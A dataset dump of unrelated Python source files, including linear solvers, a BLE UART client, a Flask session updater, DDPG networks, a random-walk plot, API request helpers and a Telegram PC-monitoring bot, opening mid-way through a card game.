= -1\n self.update()\n time.sleep(0.3)\n if self.tuopai == 1:\n self.secondcard()\n self.update()\n time.sleep(0.3)\n\n\n def run_game(self):\n \"\"\"开始游戏的主循环\"\"\"\n self.update()\n Flag = True\n while Flag == True:\n if self.istrusteeship1 == True and turn == 1 and len(pai)!=0: #判断托管及人机对战\n self.tuoguan()\n elif self.istrusteeship2 == True and turn == -1 and len(pai)!=0:\n self.tuoguan()\n for event in 
pygame.event.get(): #鼠标操作\n if event.type == pygame.QUIT:\n sys.exit()\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.mouse(event.pos) # 鼠标事件,调用mouse函数\n if len(pai) == 0 and self.return_area.collidepoint(event.pos):\n Flag = False # 把停止先停了,看下结算界面\n self.renew()\n if len(pai) == 0 and self.again_area.collidepoint(event.pos):\n self.renew()\n self.update()\n pygame.display.flip()\n\n def secondcard(self): #处理自动或托管模式下打出的牌\n global turn\n if self.istrusteeship1==True and turn == 1: #玩家一托管更新打出的那张牌\n self.newcard = self.lnewcard\n setpoker.append(self.newcard)\n player1.remove(self.newcard)\n elif self.istrusteeship2==True and turn == -1 : #玩家二托管更新打出的那张牌\n self.newcard = self.lnewcard\n setpoker.append(self.newcard)\n player2.remove(self.newcard)\n turn = -turn\n\n def trusteeship(self, lst): # 判断自动模式下应该打出的那张牌或者选择摸牌\n new_card = ''\n max1=''\n dict = {'count_meihua': 0, 'count_fangkuai': 0, 'count_hongtao': 0, 'count_heitao': 0}\n #if len(lst) == 0:\n # self.reset(lst)\n for item in lst:\n if item[4] == 'u':\n dict['count_meihua'] += 1\n elif item[4] == 'k':\n dict['count_fangkuai'] += 1\n elif item[4] == 't':\n dict['count_hongtao'] += 1\n else:\n dict['count_heitao'] += 1\n for k, v in dict.items():\n if v == max(dict.values()):\n max1 = k\n if turn==1 and (len(player1)+3*len(pai)+len(setpoker)-2) np.array:\n \"\"\"\n Solves the solution to Ax=b using the gaussian elimination method. This does pivot for the cases where there is a\n 0 along the diagonal of the matrix A.\n\n :param A: Matrix of coefficients\n :param b: Solution vector\n :return: The solution x of the linear system\n \"\"\"\n A, b = handle_arrays(A, b)\n n = len(b)\n\n # Set up scale factors\n s = np.zeros(n)\n for i in range(n):\n s[i] = max(np.abs(A[i, :]))\n\n for k in range(0, n - 1):\n # If needed, perform row interchange\n p = np.argmax(np.abs(A[k:n, k])/s[k:n]) + k\n if p != k:\n _row_interchange(b, k, p)\n _row_interchange(s, k, p)\n _row_interchange(A, k, p)\n\n # Elimination\n for i in range(k + 1, n):\n if A[i, k] != 0.0:\n lam = A[i, k]/A[k, k]\n A[i, k + 1:n] = A[i, k + 1:n] - lam*A[k, k + 1:n]\n b[i] = b[i] - lam*b[k]\n\n # Back Substitution\n b[n - 1] = b[n - 1]/A[n - 1, n - 1]\n for k in range(n - 2, -1, -1):\n b[k] = (b[k] - np.dot(A[k, k + 1:n], b[k + 1:n]))/A[k, k]\n return b\n\n\ndef choleski_decomposition(A: Union[np.ndarray, List]) -> np.array:\n \"\"\"\n Finds the Choleski decomposition of matrix A, such that [L][L]^T = A.\n\n Note:\n - A must be symmetric\n - A must be positive definite. If not, then an Assertion error will be raised.\n\n :param A: Matrix of coefficients\n :return: L, the choleski decomposition of A\n \"\"\"\n A = handle_arrays(A)\n n = len(A)\n for k in range(n):\n value = A[k, k] - np.dot(A[k, 0:k], A[k, 0:k])\n assert value >= 0, \"Matrix is not positive definite.\"\n A[k, k] = np.sqrt(value)\n for i in range(k + 1, n):\n A[i, k] = (A[i, k] - np.dot(A[i, 0:k], A[k, 0:k]))/A[k, k]\n for k in range(1, n): A[0:k, k] = 0.0\n return A\n\n\ndef choleski_solve(L: Union[np.ndarray, List], b: Union[np.ndarray, List]) -> np.array:\n \"\"\"\n Solves the solution to LL^Tx=b with L being the Choleski decomposition of some matrix A. 
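# --- Editor's sketch (not part of the original record): a quick check of
# gauss_solve against numpy. Assumptions: the import path follows the record's
# sub_path, and handle_arrays coerces the inputs to float arrays; copies are
# passed because the solver works in place.
import numpy as np
from eng_analysis.linear_solvers import gauss_solve

A = np.array([[4.0, -2.0, 1.0],
              [-2.0, 4.0, -2.0],
              [1.0, -2.0, 4.0]])
b = np.array([11.0, -16.0, 17.0])
x = gauss_solve(A.copy(), b.copy())
assert np.allclose(A @ x, b)  # the returned vector solves the original system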
Use choleski_decomposition\n to find L prior to using this function.\n\n :param L: Choleski decomposition of some matrix A\n :param b: Solution vector\n :return: The solution x of the linear system\n \"\"\"\n L, b = handle_arrays(L, b)\n n = len(b)\n # Solution of [L]{y} = {b}\n for k in range(n):\n b[k] = (b[k] - np.dot(L[k, 0:k], b[0:k]))/L[k, k]\n # Solution of [L_transpose]{x} = {y}\n for k in range(n - 1, -1, -1):\n b[k] = (b[k] - np.dot(L[k + 1:n, k], b[k + 1:n]))/L[k, k]\n return b\n\n\ndef lu_decomposition3(c: Iterable, d: Iterable, e: Iterable):\n \"\"\"\n Performs the LU decomposition of a tridiagonal matrix. More details can be seen on page 60 of the book in the\n readme.\n\n :param c: Array of the lower diagonal\n :param d: Array of the diagonal\n :param e: Array of the upper diagonal\n :return: c, d, e --> The diagonals of the decomposed matrix\n \"\"\"\n c, d, e = handle_arrays(c, d, e)\n n = len(d)\n for k in range(1, n):\n lam = c[k - 1]/d[k - 1]\n d[k] = d[k] - lam*e[k - 1]\n c[k - 1] = lam\n return c, d, e\n\n\ndef lu_solve3(c: Union[List, np.ndarray], d: Union[List, np.ndarray], e: Union[List, np.ndarray],\n b: Union[List, np.ndarray]):\n \"\"\"\n Solves the solution to Ax=b where c, d, and e are the vectors returned from lu_decomposition3.\n\n :param c: c vector from lu_decomposition3\n :param d: d vector from lu_decomposition3\n :param e: e vector from lu_decomposition3\n :param b: Solution vector\n :return: The solution x to Ax=b\n \"\"\"\n b = handle_arrays(b)\n n = len(d)\n for k in range(1, n):\n b[k] = b[k] - c[k - 1]*b[k - 1]\n b[n - 1] = b[n - 1]/d[n - 1]\n for k in range(n - 2, -1, -1):\n b[k] = (b[k] - e[k]*b[k + 1])/d[k]\n return b\n\n\ndef lu_decomposition(A: Union[np.array, List]) -> Tuple[np.array, np.array]:\n \"\"\"\n Performs LU decomposition with pivoting to handle zeros on the diagonal.\n\n :param A: Matrix of coefficients\n :return: LU, seq where LU contains U in the upper triangle portion and the non-diagonal terms of L in the lower\n triangle. The permutations are recorded in the vector \"seq.\"\n \"\"\"\n A = handle_arrays(A)\n n = len(A)\n seq = np.arange(n)\n\n # Set up scale factors\n s = np.zeros(n)\n for i in range(n):\n s[i] = max(abs(A[i, :]))\n\n for k in range(0, n - 1):\n\n # Row interchange, if needed\n p = np.argmax(np.abs(A[k:n, k])/s[k:n]) + k\n if p != k:\n _row_interchange(s, k, p)\n _row_interchange(A, k, p)\n _row_interchange(seq, k, p)\n\n # Elimination\n for i in range(k + 1, n):\n if A[i, k] != 0.0:\n lam = A[i, k]/A[k, k]\n A[i, k + 1:n] = A[i, k + 1:n] - lam*A[k, k + 1:n]\n A[i, k] = lam\n return A, seq\n\n\ndef lu_solve(LU: Union[np.array, List], b: Union[np.array, List], seq: Union[np.array, List]) -> np.array:\n \"\"\"\n Solves the solution to LUx=b with LU being the LU decomposition of some matrix A. 
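# --- Editor's sketch (not part of the original record): the tridiagonal
# routines above on a 4x4 system with bands -1/2/-1, whose exact solution for
# this right-hand side is all ones. Same import-path assumption as the
# previous sketch.
import numpy as np
from eng_analysis.linear_solvers import lu_decomposition3, lu_solve3

c = -np.ones(3)          # lower diagonal
d = 2.0 * np.ones(4)     # main diagonal
e = -np.ones(3)          # upper diagonal
b = np.array([1.0, 0.0, 0.0, 1.0])
c, d, e = lu_decomposition3(c, d, e)
x = lu_solve3(c, d, e, b)
assert np.allclose(x, 1.0)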
Use lu_decomposition to find LU\n prior to using this function.\n\n :param LU: The LU matrix returned from lu_decomposition\n :param b: Solution vector\n :param seq: The recorded permutations from lu_decomposition\n :return: The solution x of the linear system\n \"\"\"\n LU, b = handle_arrays(LU, b)\n n = len(LU)\n\n # Rearrange constant vector; store it in [x]\n x = b.copy()\n for i in range(n):\n x[i] = b[seq[i]]\n\n # Solution\n for k in range(1, n):\n x[k] = x[k] - np.dot(LU[k, 0:k], x[0:k])\n x[n - 1] = x[n - 1]/LU[n - 1, n - 1]\n for k in range(n - 2, -1, -1):\n x[k] = (x[k] - np.dot(LU[k, k + 1:n], x[k + 1:n]))/LU[k, k]\n return x\n\n\ndef _row_interchange(v, i, j):\n \"\"\"\n Performs a row interchange by taking in a numpy array \"v\" and swapping rows \"i\" and \"j\".\n\n :param v: Numpy array\n :param i: A row in v\n :param j: A row in v\n \"\"\"\n if len(v.shape) == 1:\n v[i], v[j] = v[j], v[i]\n else:\n v[[i, j], :] = v[[j, i], :]\n\n\nif __name__ == '__main__':\n A_ = np.array([\n [0, -1, 0, 0],\n [0, 0, -1, 1],\n [0, -1, 2, -1],\n [-1, 2, -1, 0]\n ])\n b_ = np.array([1, 0, 0, 0])\n print(gauss_solve(A_, b_))\n print(np.linalg.solve(A_, b_))\n","repo_name":"gabemorris12/eng_analysis","sub_path":"eng_analysis/linear_solvers.py","file_name":"linear_solvers.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"883402704","text":"##\nimport asyncio\nimport sys\nimport time\n\nfrom bleak import BleakScanner, BleakClient\nfrom bleak.backends.scanner import AdvertisementData\nfrom bleak.backends.device import BLEDevice\n\nclass BLE_UART:\n\t#ESP32_MAC = \"F4:12:FA:5B:3D:81\"#SIDA'\n\t#ESP32_MAC = \"F4:12:FA:5B:3F:A9\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:D6:4D\"#MATMO'\n\t#ESP32_MAC = \"7C:DF:A1:FD:6E:89\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:D5:E9\"\n\t#ESP32_MAC = \"68:B6:B3:21:AF:AD\"#KSIGMI'\n\t#ESP32_MAC = \"68:B6:B3:21:AF:65\"\n\t#ESP32_MAC = \"68:B6:B3:21:AF:39\"\n\t#ESP32_MAC = \"68:B6:B3:21:B2:1D\"\n\tESP32_MAC = \"7C:DF:A1:FD:6E:89\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:73:21\"#TKHASHI'\n\tUART_SERVICE_UUID = \"6E400001-B5A3-F393-E0A9-E50E24DCCA9E\"\n\tUART_RX_CHAR_UUID = \"6E400002-B5A3-F393-E0A9-E50E24DCCA9E\"\n\tUART_TX_CHAR_UUID = \"6E400003-B5A3-F393-E0A9-E50E24DCCA9E\"\n\n\t# All BLE devices have MTU of at least 23. 
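# --- Editor's sketch (not part of the original record): the chunking idea
# described in the surrounding comment, as a standalone helper. `ble` stands
# for a connected BLE_UART instance (hypothetical name); `chunk` defaults to
# the 20-byte figure quoted for the minimum MTU.
async def write_chunked(ble, payload: bytes, chunk: int = 20):
    # Slice the payload so no single GATT write exceeds the safe size.
    for i in range(0, len(payload), chunk):
        await ble.write(payload[i:i + chunk])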
Subtracting 3 bytes overhead, we can\n\t# safely send 20 bytes at a time to any device supporting this service.\n\t# Here a larger negotiated MTU is assumed, so up to 512 bytes are sent per write.\n\tUART_SAFE_SIZE = 512\n\t\n\tdef __init__(self, peripheral_name='ESP32 UART Test'):\n\t\tself._peripheral_name = peripheral_name\n\t\tself._rx_queue = asyncio.Queue()\n\t\t\n\tasync def read(self):\n\t\tmsg = await self._rx_queue.get()\n\t\treturn msg\n\n\tasync def read16b(self):\n\t\t# get_nowait() is synchronous; awaiting it would raise a TypeError.\n\t\tmsg = self._rx_queue.get_nowait()\n\t\treturn msg\n\n\tasync def write(self, msg):\n\t\tif isinstance(msg, str):\n\t\t\tmsg = msg.encode()\n\t\tawait self._client.write_gatt_char(self.UART_RX_CHAR_UUID, msg)\n\t\t\n\tasync def connect(self):\n\t\tself._discovery_queue = asyncio.Queue()\n\t\tdevice = None\n\t\tprint(f\"scanning for {self._peripheral_name}\")\n\t\t# async with BleakScanner(detection_callback=self._find_uart_device):\n\t\t\t# device: BLEDevice = await self._discovery_queue.get()\n\t\tdevice = await BleakScanner.find_device_by_address(self.ESP32_MAC)\n\t\tprint(f\"connecting to {self._peripheral_name} ...\", end=\"\")\n\t\tclient = self._client = BleakClient(device, disconnected_callback=self._handle_disconnect)\n\t\tawait client.connect()\n\t\tawait client.start_notify(self.UART_TX_CHAR_UUID, self._rx_handler)\n\t\tprint(f\" connected\")\n\t\t\n\tasync def disconnect(self):\n\t\tawait self._client.disconnect()\n\t\n\tasync def __aenter__(self):\n\t\treturn self\n\t\n\tasync def __aexit__(self, *args):\n\t\tawait self.disconnect()\n\t\t\n\tdef _rx_handler(self, _: int, data: bytearray):\n\t\tself._rx_queue.put_nowait(data)\n\t\t# print(f\"notify:{time.perf_counter()}\")\n\t\n\tdef _find_uart_device(self, device: BLEDevice, adv: AdvertisementData):\n\t\t# called whenever a device is detected during discovery\n\t\t# ignore all but target device\n\t\tif device.name == self._peripheral_name:\n\t\t\tself._discovery_queue.put_nowait(device)\n\n\t\t\n\tdef _handle_disconnect(self, _: BleakClient):\n\t\tself._rx_queue.put_nowait(None)\n\t\tprint(\"Device was disconnected, goodbye.\")\n\t\t# cancelling all tasks effectively ends the program\n\t\tfor task in asyncio.all_tasks():\n\t\t\ttask.cancel()\n\t\t\n\tasync def _queue_clr(self):\n\t\twhile self._rx_queue.qsize() != 0:\n\t\t\t# print(self._rx_queue.qsize())\n\t\t\tawait self._rx_queue.get()\n\t\t\n\n","repo_name":"NarimiMatsumoto/AKM-SOL2-MMW","sub_path":"ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32233698347","text":"import os\nimport json\n\nclass ConfigManager:\n def __init__(self):\n data = self.get_config_data()\n self.key = data['API_KEY'] if data is not None else None\n \n def get_config_data(self):\n config_path = os.path.expanduser('~/.phoenixconfig')\n\n # If the config file exists, read the name from it.\n if os.path.exists(config_path):\n with open(config_path, 'r') as f:\n config = json.load(f)\n return config\n else:\n return None\n\n def save_config_data(self):\n config_path = os.path.expanduser('~/.phoenixconfig')\n\n with open(config_path, 'w') as f:\n json.dump({\n 'API_KEY':self.key\n }, f)","repo_name":"colbyb2/phoenix","sub_path":"Phoenix/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5580871645","text":"import random\r\nimport copy\r\nimport torch\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as 
F\r\nimport torch.optim as optim\r\nnum_agents = 2\r\n\r\n\r\ndef hidden_init(layer):\r\n fan_in = layer.weight.data.size()[0]\r\n lim = 1. / np.sqrt(fan_in)\r\n return (-lim, lim)\r\n\r\nclass Actor(nn.Module):\r\n\r\n def __init__(self, state_size, action_size, seed, fc1_units=200, fc2_units=150):\r\n super(Actor, self).__init__()\r\n self.seed = torch.manual_seed(seed)\r\n self.fc1 = nn.Linear(state_size, fc1_units)\r\n self.fc2 = nn.Linear(fc1_units, fc2_units)\r\n self.fc3 = nn.Linear(fc2_units, action_size)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n self.fc1.weight.data.uniform_(*hidden_init(self.fc1))\r\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\r\n self.fc3.weight.data.uniform_(-3e-3, 3e-3)\r\n\r\n def forward(self, state):\r\n x = F.relu(self.fc1(state))\r\n x = F.relu(self.fc2(x))\r\n return F.tanh(self.fc3(x))\r\n\r\nclass Critic(nn.Module):\r\n\r\n def __init__(self, state_size, action_size, seed, fcs1_units=200, fc2_units=150):\r\n super(Critic, self).__init__()\r\n self.seed = torch.manual_seed(seed)\r\n self.fcs1 = nn.Linear((state_size+action_size) * num_agents, fcs1_units)\r\n self.fc2 = nn.Linear(fcs1_units, fc2_units)\r\n self.fc3 = nn.Linear(fc2_units, 1)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n self.fcs1.weight.data.uniform_(*hidden_init(self.fcs1))\r\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\r\n self.fc3.weight.data.uniform_(-3e-3, 3e-3)\r\n \r\n def forward(self, state, action):\r\n xs = torch.cat((state, action), dim=1)\r\n x = F.relu(self.fcs1(xs))\r\n x = F.relu(self.fc2(x))\r\n return self.fc3(x)\r\n\r\n\r\nclass OUNoise:\r\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\r\n\r\n def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):\r\n \"\"\"Initialize parameters and noise process.\"\"\"\r\n self.mu = mu * np.ones(size)\r\n self.theta = theta\r\n self.sigma = sigma\r\n self.seed = random.seed(seed)\r\n self.size = size\r\n self.reset() \r\n \r\n def reset(self):\r\n \"\"\"Reset the internal state (= noise) to mean (mu).\"\"\"\r\n self.state = copy.copy(self.mu)\r\n\r\n def sample(self):\r\n \"\"\"Update internal state and return it as a noise sample.\"\"\"\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.size)\r\n self.state = x + dx\r\n return self.state","repo_name":"keyttu/Udacity-DRLND-P3-Collaboration-and-Competition","sub_path":"Agent_Model.py","file_name":"Agent_Model.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30246060001","text":"#!/usr/bin/env python\nfrom seamm_dashboard import create_app, options\nfrom waitress import serve\n\n\ndef run():\n app = create_app()\n\n if \"debug\" in options:\n app.run(debug=True, use_reloader=True) \n else: \n # serve using waitress\n serve(app, port=options[\"port\"])\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"molssi-seamm/seamm_dashboard","sub_path":"seamm_dashboard/results_dashboard.py","file_name":"results_dashboard.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14035786439","text":"import xml.etree.ElementTree as ET\nfrom flask import request, Blueprint\nfrom Modules.Sessions.Config import sessionUpdateSchemaLocation, sessionUpdateXmlSchemaLocation, sessionUpdateXmlDataLocation\nfrom Modules.Util import validateJsonResponse, validateXmlResponse\n\nupdateSessions = 
Blueprint('updateSessions', __name__)\n\n\n# UPDATE SESSION (JSON payload, with XML fallback)\n@updateSessions.route('/sessionUpdate', methods=['POST'])\ndef updateSession():\n from appRestApi import db, Sessions\n if (request.is_json):\n sessionData = request.get_json()\n\n # Validates sent JSON before update\n if validateJsonResponse(sessionUpdateSchemaLocation, sessionData) == False:\n Sessions.query.filter_by(id=sessionData['id']).update(dict(date=sessionData['date']))\n Sessions.query.filter_by(id=sessionData['id']).update(dict(time=sessionData['time']))\n Sessions.query.filter_by(id=sessionData['id']).update(dict(duration=sessionData['duration']))\n db.session.commit()\n db.session.close()\n\n else:\n return \"There were errors while validating the json data\"\n\n else:\n return updateSessionXml()\n\n return \"Successfully updated session!\"\n\n\n# UPDATE WITH XML\ndef updateSessionXml():\n from appRestApi import db, Sessions\n sessionData = request.get_data()\n\n # Transforms data received into a non-flat xml file\n info = ET.fromstring(sessionData)\n tree = ET.ElementTree(info)\n tree.write(sessionUpdateXmlDataLocation)\n\n if validateXmlResponse(sessionUpdateXmlSchemaLocation, sessionUpdateXmlDataLocation) == True:\n print(\"Successfully validated xml!\")\n\n # Iterates over xml and finds necessary data belonging to tags\n for item in tree.iter('session'):\n updatedSessionID = item.find('id').text\n updatedSessionDate = item.find('date').text\n updatedSessionTime = item.find('time').text\n updatedSessionDuration = item.find('duration').text\n\n Sessions.query.filter_by(id=updatedSessionID).update(dict(date=updatedSessionDate))\n Sessions.query.filter_by(id=updatedSessionID).update(dict(time=updatedSessionTime))\n Sessions.query.filter_by(id=updatedSessionID).update(dict(duration=updatedSessionDuration))\n db.session.commit()\n db.session.close()\n\n return \"Successfully updated session!\"\n\n","repo_name":"stefanuntura/dataProcessingAPI","sub_path":"Modules/Sessions/UPDATE.py","file_name":"UPDATE.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4529910278","text":"# coding: utf-8\n\nfrom apisRequest import Search\nfrom strToken import tokensTeste\nimport json\nimport os\nimport time\nimport pprint\n\ns = Search()\ntks = tokensTeste()\n\ndef limpar():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef get_cep(cep = \"83602690\"):\n\n url = \"https://viacep.com.br/ws/%s/json/\" % (cep)\n\n s.make_url(url)\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n s.make_soup('html.parser')\n\n return json.loads(s.content.content.decode('utf-8'))\n\ndef send_post(message=\"Test\"):\n s.make_url(\"http://localhost/test-python-request.php\")\n s.params = {'come-of-python':message}\n s.headers = None\n myTry = s.make_content('post')\n\n if myTry == 1:\n return s.content.content\n else:\n return 0\n\ndef get_holidays():\n s.make_url(\"https://api.calendario.com.br/?json=true&token=%s&ano=2019&estado=PR&cidade=Campo_Largo\" % (tks.tk_holiday))\n s.make_content('get')\n\n list_holidays = json.loads(s.content.content.decode('utf-8'))\n\n resume_list = []\n\n for holiday in list_holidays:\n resume_list.append(\n [holiday.get('name'),holiday.get('date')]\n )\n return resume_list\n\ndef statistics_names_by_ibge(name=\"Maria\"):\n s.make_url(\"https://servicodados.ibge.gov.br/api/v2/censos/nomes/%s\" % (name))\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n\n data_statistics = json.loads(s.content.content.decode('utf-8'))\n\n return data_statistics\n\ncont = 0\n\nwhile cont < 100:\n try:\n print(\"LIST OPTIONS:\")\n\n print(\"[1] Function get_cep()\")\n print(\"[2] Function send_post()\")\n print(\"[3] Function get_holidays()\")\n print(\"[4] statistics_names_by_ibge()\")\n print(\"[0] Stop this code\")\n\n option = int(input(\"What option do you wanna?\"))\n return_function = None\n\n if option == 1:\n param = input(\"Enter with the cep:\")\n return_function = get_cep(param)\n\n elif option == 2:\n 
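# --- Editor's sketch (not part of the original record): an example client
# call for the /sessionUpdate route defined in the Flask blueprint above.
# Host, port, and field values are hypothetical.
import requests

resp = requests.post(
    "http://localhost:5000/sessionUpdate",
    json={"id": 1, "date": "2023-01-01", "time": "10:00", "duration": 60},
)
print(resp.text)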
值后,我们将它们分别附加到列表 x_values 和 y_values 的末尾\n 这里用 [-1],因为后面用了 .append() \n '''\n next_x = self.x_values[-1] + x_step\n next_y = self.y_values[-1] + y_step\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)\n\n\nwhile True:\n\n # 创建一个RandomWalk 实例,并将其包含的点都绘制出来\n rw = RandomWalk(50000) # 增加点数,初始5000\n rw.fill_walk()\n\n # 设置绘图窗口的尺寸\n '''\n 函数 figure() 用于指定图表的宽度、高度、分辨率和背景色。\n 你需要给形参 figsize 指定一个元组,向 matplotlib 指出绘图窗口的尺寸,单位为英寸。\n Python 假定屏幕分辨率为 80 像素 / 英寸,如果上述代码指定的图表尺寸不合适,可根据需要调整其中的数字。\n 如果你知道自己的系统的分辨率,可使用形参 dpi 向 figure() 传递该分辨率,以有效地利用可用的屏幕空间,如下所示:\n plt.figure(dpi=128, figsize=(10,6)) \n '''\n plt.figure(figsize = (6,4))\n\n '''\n 我们将使用颜色映射来指出漫步中各点的先后顺序,并删除每个点的黑色轮廓,让它们的颜色更明显。\n 为根据漫步中各点的先后顺序进行着色,我们传递参数 c ,并将其设置为一个列表,\n 其中包含各点的先后顺序。由于这些点是按顺序绘制的,因此给参数 c 指定的列表只需包含数字 1~5000\n '''\n point_numbers = list(range(rw.num_points))\n plt.scatter(rw.x_values, rw.y_values, c=point_numbers, cmap=plt.cm.Blues,\n edgecolors='none', s=1) # 增加点数之后,调小每个点的大小\n\n # 隐藏坐标轴\n plt.axes().get_xaxis().set_visible(False)\n plt.axes().get_yaxis().set_visible(False)\n\n # 突出起点和终点\n plt.scatter(0, 0, c='green', edgecolors='none', s=100)\n plt.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n edgecolors='none', s=100)\n\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n) :\")\n if keep_running == \"n\":\n break","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第15章 生成数据/15.3 随机漫步/动动手/15-4 改进的随机漫步.py","file_name":"15-4 改进的随机漫步.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17552224417","text":"# coding: utf-8\n\nfrom apisRequest import Search\nfrom strToken import tokensTeste\nimport json\nimport os\nimport time\nimport pprint\n\ns = Search()\ntks = tokensTeste()\n\ndef limpar():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef get_cep(cep = \"83602690\"):\n\n url = \"https://viacep.com.br/ws/%s/json/\" % (cep)\n\n s.make_url(url)\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n s.make_soup('html.parser')\n\n return json.loads(s.content.content.decode('utf-8'))\n\ndef send_post(message=\"Test\"):\n s.make_url(\"http://localhost/test-python-request.php\")\n s.params = {'come-of-python':message}\n s.headers = None\n myTry = s.make_content('post')\n\n if myTry == 1:\n return s.content.content\n else:\n return 0\n\ndef get_holidays():\n s.make_url(\"https://api.calendario.com.br/?json=true&token=%s&ano=2019&estado=PR&cidade=Campo_Largo\" % (tks.tk_holiday))\n s.make_content('get')\n\n list_holidays = json.loads(s.content.content.decode('utf-8'))\n\n resume_list = []\n\n for holiday in list_holidays:\n resume_list.append(\n [holiday.get('name'),holiday.get('date')]\n )\n return resume_list\n\ndef statistics_names_by_ibge(name=\"Maria\"):\n s.make_url(\"https://servicodados.ibge.gov.br/api/v2/censos/nomes/%s\" % (name))\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n\n data_statistics = json.loads(s.content.content.decode('utf-8'))\n\n return data_statistics\n\ncont = 0\n\nwhile cont < 100:\n try:\n print(\"LIST OPTIONS:\")\n\n print(\"[1] Function get_cep()\")\n print(\"[2] Function send_post()\")\n print(\"[3] Function get_holidays()\")\n print(\"[4] statistics_names_by_ibge()\")\n print(\"[0] Stop this code\")\n\n option = int(input(\"What option do you wanna?\"))\n return_function = None\n\n if option == 1:\n param = input(\"Enter with the cep:\")\n return_function = get_cep(param)\n\n elif option == 2:\n 
param = input(\"Enter with the message:\")\n return_function = send_post(param)\n\n elif option == 3:\n return_function = get_holidays()\n\n elif option == 4:\n param = input(\"Enter with the name:\")\n return_function = statistics_names_by_ibge(param)\n\n elif option == 0:\n break\n else:\n break\n\n qtde_time = 3\n qtde_time = int(input(\"How much time do you wanna see the answer?\"))\n\n bar = \"\"\n\n for i in range(qtde_time):\n bar += \"\\033[33;43m \\033[m\"\n pp = pprint.PrettyPrinter()\n pp.pprint(return_function)\n print(bar)\n\n time.sleep(1)\n limpar()\n\n limpar()\n except Exception as e:\n print(e)\n continue\n\n cont += 1","repo_name":"devBino/python","sub_path":"apis_with_request/search_in_apis.py","file_name":"search_in_apis.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983030107","text":"\"\"\"\n수 찾기\n문제: N개의 정수 A[1], A[2],...A[N]이 주어져 있을 때, \n이 안에 X라는 정수가 존재하는지 알아내는 프로그램을 작성하시오.\n\n입력: 첫째 줄에 자연수 N(1 <= N <= 100,000)이 주어진다. \n다음 줄에는 N개의 정수 A[1],...A[N]이 주어진다.\n다음 줄에는 M(1 <= M <= 100,000)이 주어진다.\n다음 줄에는 M개의 수들이 주어지는데, 이 수들이 A안에 존재하는지 알아내면 된다.\n모든 정수의 범위는 -2^31 보다 크거나 같고 2^31보다 작다.\n\n출력: M개의 줄에 답을 출력한다. 존재하면 1을 존재하지 않으면 0을 출력한다.\n\n5\n4 1 5 2 3\n5\n1 3 7 9 5\n\n1\n1\n0\n0\n1\n\"\"\"\nimport sys\n\ndef binary_search(n_list, find_num):\n left = 0\n right = len(n_list) - 1\n while left <= right:\n mid = (left + right) // 2\n if n_list[mid] == find_num:\n return 1\n elif n_list[mid] > find_num:\n right = mid - 1\n else:\n left = mid + 1\n return 0\n\n\ndef solution(n, n_list, m, m_list):\n n_list.sort()\n for find_num in m_list:\n print(binary_search(n_list, find_num))\n\ndef init():\n n = int(sys.stdin.readline())\n n_list = list(map(int, sys.stdin.readline().split()))\n m = int(sys.stdin.readline())\n m_list = list(map(int, sys.stdin.readline().split()))\n solution(n, n_list, m, m_list)\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/boj/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24157788374","text":"import os\r\nimport time\r\nimport threading\r\nimport telebot\r\nimport psutil\r\n\r\nTOKEN = \"\" # Токен TG бота (@BotFather)\r\nOWNER_ID = 1532847216 # ID админа, необходим для доступа к боту\r\nALERT_THRESHOLD = 85 # Аварийный процент загрузки, при котором автоматический высылается предупреждение\r\nALERT_INTERVAL = 60 # Секунды задержки между авто. проверкой состояния\r\n\r\nbot = telebot.TeleBot(TOKEN)\r\n\r\ndef is_owner(message):\r\n return message.from_user.id == OWNER_ID\r\n\r\n@bot.message_handler(commands=['start'], func=is_owner)\r\ndef start(message):\r\n bot.reply_to(message, \"Привет! Я бот, который отслеживает состояние вашего ПК.\")\r\n\r\n@bot.message_handler(commands=['status'], func=is_owner)\r\ndef 